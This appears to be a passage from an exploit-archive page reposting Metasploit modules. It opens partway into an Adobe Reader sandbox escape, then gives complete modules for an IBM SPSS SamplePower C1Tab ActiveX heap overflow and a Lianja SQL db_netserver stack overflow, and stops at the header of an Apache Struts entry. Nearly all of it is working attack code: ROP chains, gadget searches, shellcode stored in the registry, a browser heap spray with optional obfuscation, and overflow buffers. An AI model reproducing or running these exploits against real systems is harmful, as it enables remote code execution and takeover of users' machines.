              'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> 'May 14 2013'
    }))
 
  end
 
  def on_new_session
    print_status("Deleting Malicious Registry Keys...")
    if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
      print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
    end
    if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
      print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
    end
    print_status("Cleanup finished")
  end
 
  # Test the process integrity level by trying to create a directory on the TEMP folder
  # Access should be granted with Medium Integrity Level
  # Access should be denied with Low Integrity Level
  # Usint this solution atm because I'm experiencing problems with railgun when trying
  # use GetTokenInformation
  def low_integrity_level?
    tmp_dir = expand_path("%TEMP%")
    cd(tmp_dir)
    new_dir = "#{rand_text_alpha(5)}"
    begin
      session.shell_command_token("mkdir #{new_dir}")
    rescue
      return true
    end
 
    if directory?(new_dir)
      session.shell_command_token("rmdir #{new_dir}")
      return false
    else
      return true
    end
  end
 
  def check_trigger
    signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
    if signature == target['AdobeCollabSyncTriggerSignature']
      return true
    end
    return false
  end
 
  def collect_addresses
    # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
    @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
    vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")
 
    # find kernel32.dll
    kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
    @addresses['kernel32.dll'] = kernel32["return"]
    if @addresses['kernel32.dll'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
    end
    vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")
 
    # find kernel32.dll methods
    virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
    @addresses['VirtualAlloc'] = virtual_alloc["return"]
    if @addresses['VirtualAlloc'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
    end
    vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")
 
    reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
    @addresses['RegGetValueA'] = reg_get_value["return"]
    if @addresses['RegGetValueA'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
    end
    vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")
 
    # find ntdll.dll
    ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
    @addresses['ntdll.dll'] = ntdll["return"]
    if @addresses['ntdll.dll'] == 0
      fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
    end
    vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
  end
 
  # Search a gadget identified by pattern on the process memory
  def search_gadget(base, offset_start, offset_end, pattern)
    mem  = base + offset_start
    length = offset_end - offset_start
    mem_contents = session.railgun.memread(mem, length)
    return mem_contents.index(pattern)
  end
 
  # Search for gadgets on ntdll.dll
  def search_gadgets
    ntdll_text_base = 0x10000
    search_length =  0xd6000
 
    @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
    if @gadgets['mov [edi], ecx # ret'].nil?
      fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
    end
    @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
    @gadgets['mov [edi], ecx # ret'] += ntdll_text_base
    vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")
 
    @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
    vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")
 
    @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
    if @gadgets['pop edi # ret'].nil?
      fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
    end
    @gadgets['pop edi # ret'] += @addresses['ntdll.dll']
    @gadgets['pop edi # ret'] += ntdll_text_base
    vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")
 
    @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
    if @gadgets['pop ecx # ret'].nil?
      fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
    end
    @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
    @gadgets['pop ecx # ret'] += ntdll_text_base
    vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
  end
 
  def store(buf, data, address)
    i = 0
    while (i < data.length)
      buf << [@gadgets['pop edi # ret']].pack("V")
      buf << [address + i].pack("V") # edi
      buf << [@gadgets['pop ecx # ret']].pack("V")
      buf << data[i, 4].ljust(4,"\x00") # ecx
      buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
      i = i + 4
    end
    return i
  end
 
  def create_rop_chain
    mem = 0x0c0c0c0c
 
    buf =  [0x58000000 + 1].pack("V")
    buf << [0x58000000 + 2].pack("V")
    buf << [0].pack("V")
    buf << [0x58000000 + 4].pack("V")
 
    buf << [0x58000000 + 5].pack("V")
    buf << [0x58000000 + 6].pack("V")
    buf << [0x58000000 + 7].pack("V")
    buf << [@gadgets['ret']].pack("V")
    buf << rand_text(8)
 
    # Allocate Memory To store the shellcode and the necessary data to read the
    # shellcode stored in the registry
    buf << [@addresses['VirtualAlloc']].pack("V")
    buf << [@gadgets['ret']].pack("V")
    buf << [mem].pack("V")        # lpAddress
    buf << [0x00010000].pack("V") # SIZE_T dwSize
    buf << [0x00003000].pack("V") # DWORD flAllocationType
    buf << [0x00000040].pack("V") # flProtect
 
    # Put in the allocated memory the necessary data in order to read the
    # shellcode stored in the registry
    # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
    reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
    reg_key_length = store(buf, reg_key, mem)
    # 2) The reg entry: shellcode
    value_key = "shellcode\x00"
    store(buf, value_key, mem + reg_key_length)
    # 3) The output buffer size: 0x3000
    size_buffer = 0x3000
    buf << [@gadgets['pop edi # ret']].pack("V")
    buf << [mem + 0x50].pack("V") # edi
    buf << [@gadgets['pop ecx # ret']].pack("V")
    buf << [size_buffer].pack("V")     # ecx
    buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
 
    # Copy the shellcode from the the registry to the
    # memory allocated with executable permissions and
    # ret into there
    buf << [@addresses['RegGetValueA']].pack("V")
    buf << [mem + 0x1000].pack("V") # ret to shellcode
    buf << [0x80000001].pack("V")   # hkey => HKEY_CURRENT_USER
    buf << [mem].pack("V")          # lpSubKey
    buf << [mem + 0x3c].pack("V")   # lpValue
    buf << [0x0000FFFF].pack("V")   # dwFlags => RRF_RT_ANY
    buf << [0].pack("V")            # pdwType
    buf << [mem + 0x1000].pack("V") # pvData
    buf << [mem + 0x50].pack("V")   # pcbData
  end
 
  # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
  def store_data_registry(buf)
    vprint_status("Creating the Registry Key to store the shellcode...")
 
    if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
      vprint_good("Registry Key created")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
    end
 
    vprint_status("Storing the shellcode in the Registry...")
 
    if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
      vprint_good("Shellcode stored")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
    end
 
    # Create the Malicious registry entry in order to exploit....
    vprint_status("Creating the Registry Key to trigger the Overflow...")
    if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
      vprint_good("Registry Key created")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
    end
 
    vprint_status("Storing the trigger in the Registry...")
    if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
      vprint_good("Trigger stored")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
    end
  end
 
  def trigger_overflow
    vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
    # Create a thread in order to execute the necessary code to launch AdobeCollabSync
    ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
    if ret['return'] < 1
      print_error("Unable to CreateThread")
      return
    end
    hthread = ret['return']
 
    vprint_status("Resuming the Thread...")
    # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
    ret = client.railgun.kernel32.ResumeThread(hthread)
    if ret['return'] < 1
      fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
    end
  end
 
  def check
    @addresses = {}
    acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
    @addresses['AcroRd32.exe'] = acrord32["return"]
    if @addresses['AcroRd32.exe'] == 0
      return Msf::Exploit::CheckCode::Unknown
    elsif check_trigger
      return Msf::Exploit::CheckCode::Vulnerable
    else
      return Msf::Exploit::CheckCode::Detected
    end
  end
 
  def exploit
    @addresses = {}
    @gadgets = {}
 
    print_status("Verifying we're in the correct target process...")
    acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
    @addresses['AcroRd32.exe'] = acrord32["return"]
    if @addresses['AcroRd32.exe'] == 0
      fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
    end
    vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
 
    print_status("Checking the AcroRd32.exe image...")
    if not check_trigger
      fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
    end
 
    print_status("Checking the Process Integrity Level...")
    if not low_integrity_level?
      fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
    end
 
    print_status("Collecting necessary addresses for exploit...")
    collect_addresses
 
    print_status("Searching the gadgets needed to build the ROP chain...")
    search_gadgets
    print_good("Gadgets collected...")
 
    print_status("Building the ROP chain...")
    buf = create_rop_chain
    print_good("ROP chain ready...")
 
    print_status("Storing the shellcode and the trigger in the Registry...")
    store_data_registry(buf)
 
    print_status("Executing AdobeCollabSync.exe...")
    trigger_overflow
  end
end

 

[DarckSol]

IBM SPSS SamplePower C1Tab ActiveX Heap Overflow Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn
 
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => NormalRanking,
    :classid    => "{24E04EBF-014D-471F-930E-7654B1193BA9}",
    :method     => "TabCaption"
  })
 
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",
      'Description'    => %q{
          This module exploits a heap based buffer overflow in the C1Tab ActiveX control,
        while handling the TabCaption property. The affected control can be found in the
        c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has
        been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7
        SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Gavrun', # Vulnerability discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2012-5946' ],
          [ 'OSVDB', '92845' ],
          [ 'BID', '59559' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ]
        ],
      'Payload'        =>
        {
          'Space' => 991,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3',
            {
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c08
            }
          ],
          [ 'IE 7 on Windows XP SP3',
            {
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c08
            }
          ],
          [ 'IE 8 on Windows XP SP3',
            {
              'Offset' => '0x5f4',
              'Ret' => 0x0c0c0c0c,
              'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
            }
          ],
          [ 'IE 8 on Windows 7',
            {
              'Offset' => '0x5f4',
              'Ret' => 0x0c0c0c0c,
              'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 26 2013",
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
 
  end
 
  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'
 
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
    ie_name = "IE #{ie}"
 
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end
 
    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end
    print_status("target not found #{agent}")
    return nil
  end
 
  def ie_heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
 
    # Land the payload at 0x0c0c0c0c
    # For IE 6, 7, 8
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);
    |
 
    js = heaplib(js, {:noobfu => true})
 
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end
 
    return js
  end
 
  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end
 
  def rop_chain
    # gadgets from c1sizer.ocx
    rop_gadgets =
      [
        0x0c0c0c10,
        0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack
        0x100076f1, # pop eax # ret
        0x10029134, # &VirtualAllox
        0x1001b41e, # jmp [eax]
        0x0c0c0c34, # ret address
        0x0c0c0c0c,  # lpAddress
        0x00001000, # dwSize
        0x00001000, # flAllocationType
        0x00000040  # flProtect
      ].pack("V*")
 
    return rop_gadgets
  end
 
  def get_payload(t, cli)
    code = payload.encoded
    # No rop. Just return the payload.
 
    if (t.name =~ /IE 6/ or t.name =~ /IE 7/)
      fake_memory = [
        0x0c0c0c10,
        0x0c0c0c14
      ].pack("V*")
      return fake_memory + code
    end
 
    return rop_chain + stack_pivot + code
  end
 
  # Objects filling aren't randomized because
  # this combination make exploit more reliable.
  def fake_object(size)
    object = "B" * 8     # metadata
    object << "D" * size # fake object
    return object
  end
 
  def stack_pivot
    pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
    pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
    pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
    return pivot
  end
 
  # Check the memory layout documentation at the end of the module
  def overflow_xp
    buf = rand_text_alpha(0x10000)
    # Start to overflow
    buf << fake_object(0x40)
    buf << fake_object(0x30)
    buf << fake_object(0x30)
    buf << fake_object(0x40)
    buf << fake_object(0x10)
    buf << fake_object(0x10)
    buf << fake_object(0x20)
    buf << fake_object(0x10)
    buf << fake_object(0x30)
    buf << "B" * 0x8     # metadata chunk
    buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object
  end
 
  # Check the memory layout documentation at the end of the module
  def overflow_xp_ie8
    buf = [
      junk,       # padding
      0x1001b557, # pop eax # c1sizer.ocx
      0x0c0c0c14, # eax
      0x10028ad8  # xchg eax,esp # c1sizer.ocx # stackpivot to the heap
    ].pack("V*")
    buf << rand_text_alpha(0x10000-16)
    # Start to overflow
    buf << "B" * 0x8     # metadata chunk
    buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object
  end
 
  # Check the memory layout documentation at the end of the module
  def overflow_w7
    buf = [
      junk,       # padding
      0x1001b557, # pop eax # c1sizer.ocx
      0x0c0c0c14, # eax
      0x10028ad8  # xchg eax,esp # c1sizer.ocx # stackpivot to the heap
    ].pack("V*")
    buf << rand_text_alpha(0x10000-16)
    # Start to oveflow
    buf << fake_object(0x3f8)
    buf << fake_object(0x1a0)
    buf << fake_object(0x1e0)
    buf << fake_object(0x1a0)
    buf << fake_object(0x1e0)
    buf << fake_object(0x1a0)
    buf << "B" * 0x8     # metadata chunk
    buf << "\x0c" * 0x40 # Overflow first 0x40 of the exploited object
  end
 
  def get_overflow(t)
    if t.name =~ /Windows 7/
      return overflow_w7
    elsif t.name =~ /Windows XP/ and t.name =~ /IE 8/
      return overflow_xp_ie8
    elsif t.name =~ /Windows XP/
      return overflow_xp
    end
  end
 
  # * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer.
  # * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer.
  # * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the
  # TabCaption property.
  def trigger_w7
    target = rand_text_alpha(5 + rand(3))
    target2 = rand_text_alpha(5 + rand(3))
    target3 = rand_text_alpha(5 + rand(3))
    target4 = rand_text_alpha(5 + rand(3))
    target5 = rand_text_alpha(5 + rand(3))
    target6 = rand_text_alpha(5 + rand(3))
    target7 = rand_text_alpha(5 + rand(3))
    target8 = rand_text_alpha(5 + rand(3))
    target9 = rand_text_alpha(5 + rand(3))
    target10 = rand_text_alpha(5 + rand(3))
    target11 = rand_text_alpha(5 + rand(3))
    target12 = rand_text_alpha(5 + rand(3))
    target13 = rand_text_alpha(5 + rand(3))
    target14 = rand_text_alpha(5 + rand(3))
    target15 = rand_text_alpha(5 + rand(3))
 
    objects = %Q|
    <object id="#{target}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target2}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target3}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target4}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target5}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target6}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target7}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target8}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target9}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target10}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target11}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target12}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target13}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target14}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    <object id="#{target15}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    |
    return objects, target7
  end
 
  # * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just
  # an object is sufficient to overflow itself and get control execution.
  def trigger_xp
    target = rand_text_alpha(5 + rand(3))
 
    objects = %Q|
    <object id="#{target}" width="100%" height="100%" classid="clsid:24E04EBF-014D-471F-930E-7654B1193BA9"></object>
    |
    return objects, target
  end
 
  def get_trigger(t)
    if t.name =~ /Windows 7/
      return trigger_w7
    elsif t.name =~ /Windows XP/
      return trigger_xp
    end
  end
 
  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)
    buf = get_overflow(my_target)
 
    objects, target_object = get_trigger(my_target)
 
    html = %Q|
    <html>
    <head>
    </head>
    <body>
    #{objects}
    <script>
    CollectGarbage();
    #{js}
    #{target_object}.Caption = "";
    #{target_object}.TabCaption(0) = "#{buf}";
    </script>
    </body>
    </html>
    |
 
    return html
  end
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")
 
    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
 
    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end
 
end
 
 
=begin
 
[*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test
 
    Heap entries for Segment01 in Heap 01ca0000
         address: psize . size  flags   state (requested size)
        025c0000: 00000 . 00040 [01] - busy (40)
        025c0040: 00040 . 10008 [01] - busy (10000)
        025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer
        025e0050: 10008 . 00048 [01] - busy (40)
        025e0098: 00048 . 00038 [01] - busy (30)
        025e00d0: 00038 . 00038 [01] - busy (30)
        025e0108: 00038 . 00048 [01] - busy (40)
        025e0150: 00048 . 00018 [01] - busy (10)
        025e0168: 00018 . 00018 [01] - busy (10)
        025e0180: 00018 . 00028 [01] - busy (20)
        025e01a8: 00028 . 00018 [01] - busy (10)
        025e01c0: 00018 . 00010 [00]
        025e01d0: 00010 . 00038 [01] - busy (30)
        025e0208: 00038 . 001e8 [01] - busy (1e0)   // Vulnerable object
        025e03f0: 001e8 . 001a8 [01] - busy (1a0)
 
 
[*] Windows XP / ie8 memory layout at oveflow, based on empirical test
 
    Heap entries for Segment01 in Heap 03350000
         address: psize . size  flags   state (requested size)
        03840000: 00000 . 00040 [01] - busy (40)
        03840040: 00040 . 10008 [01] - busy (10000)
        03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer
        03860050: 10008 . 001e8 [01] - busy (1e0)   // Vulnerable object
        03860238: 001e8 . 001a8 [01] - busy (1a0)
        038603e0: 001a8 . 00078 [00]
        03860458: 00078 . 00048 [01] - busy (40)
        038604a0: 00048 . 00048 [01] - busy (40)
        038604e8: 00048 . 00618 [01] - busy (610)
        03860b00: 00618 . 10208 [01] - busy (10200)
        03870d08: 10208 . 032f8 [10]
        03874000:      000cc000      - uncommitted bytes.
 
 
[*] windows 7 / ie8 memory layout at oveflow, based on empirical test
 
  03240000: 00000 . 00040 [101] - busy (3f)
  03240040: 00040 . 10008 [101] - busy (10000)
  03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer
  03260050: 10008 . 00400 [101] - busy (3f8) Internal
  03260450: 00400 . 001a8 [101] - busy (1a0)
  032605f8: 001a8 . 001e8 [101] - busy (1e0)
  032607e0: 001e8 . 001a8 [101] - busy (1a0)
  03260988: 001a8 . 001e8 [101] - busy (1e0)
  03260b70: 001e8 . 001a8 [101] - busy (1a0)
  03260d18: 001a8 . 001e8 [101] - busy (1e0)   # Our vulnerable object, target7, seems reliable according to testing
  03260f00: 001e8 . 001a8 [101] - busy (1a0)
  032610a8: 001a8 . 001e8 [101] - busy (1e0)
  03261290: 001e8 . 001a8 [101] - busy (1a0)
  03261438: 001a8 . 001e8 [101] - busy (1e0)
  03261620: 001e8 . 001a8 [101] - busy (1a0)
  032617c8: 001a8 . 001e8 [101] - busy (1e0)
 
[*] Overflow:
 
.text:100146E1                 push    eax            ; lpString2
.text:100146E2                 push    CaptionlpBuffer; lpString1
.text:100146E8                 call    ds:lstrcatA    ; Heap Overflow when setting a new CaptionString > 0x10000
 
[*] Get Control after overflow:
 
.text:1001A40D                 call    overflow_sub_1001469E; Overflow happens here
.text:1001A412                 mov     ecx, edi       ; edi points to the overflowed object, then ecx (this)
.text:1001A414                 call    get_control_sub_100189EC; Get profit from the overflowed object here
 
.text:100189EC get_control_sub_100189EC proc near     ; CODE XREF: sub_1001A1A9+B6p
.text:100189EC                                        ; SetTabCaption_sub_1001A2EC+128p ...
.text:100189EC
.text:100189EC var_4           = dword ptr -4
.text:100189EC
.text:100189EC                 push    ebp
.text:100189ED                 mov     ebp, esp
.text:100189EF                 push    ecx
.text:100189F0                 mov     eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled
.text:100189F3                 and     [ebp+var_4], 0
.text:100189F7                 test    eax, eax
.text:100189F9                 jz      short locret_10018A23
.text:100189FB                 mov     ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled
.text:100189FD                 lea     edx, [ebp+var_4]
.text:10018A00                 push    edx
.text:10018A01                 push    offset unk_1002B628
.text:10018A06                 push    eax
.text:10018A07                 call    dword ptr [ecx] # woot!
 
=end
 
# BA09B43BF3EA2C67   1337day.com [2013-05-29]   2E5FD124EB8B8F55 #

 

[DarckSol]

Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow

This Metasploit module exploits a stack buffer overflow in the db_netserver process which is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::RopDb

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the db_netserver process which
        is spawned by the Lianja SQL server.  The issue is fixed in Lianja SQL 1.0.0RC5.2.
      },
      'Author'         => 'Spencer McIntyre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2013-3563' ]
      ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 20
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          'Space'           => 500,
          'BadChars'        => "\x01"
        },
      'Targets'        =>
        [
          [ 'Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2', { 'rop_target' => '2003' } ],
          [ 'Lianja SQL 1.0.0RC5.1 / Windows XP SP3', { 'rop_target' => 'xp' } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'May 22 2013'))

    register_options(
      [
        Opt::RPORT(8001),
      ], self.class)
  end

  def check
    begin
      connect
    rescue
      return Exploit::CheckCode::Safe
    end
    sock.put("db_net")
    if sock.recv(4) =~ /\d{1,5}/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    sock.put("db_net")
    sock.recv(4)

    print_status("#{rhost}:#{rport} - Sending Malicious Data")
    evil_data =  '000052E1'
    evil_data << 'A'
    evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur
    evil_data << generate_rop_payload('msvcrt', payload.encoded, {'target' => target['rop_target']})
    sock.put(evil_data)
    disconnect
  end
end

 

[DarckSol]

Apache Struts includeParams Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
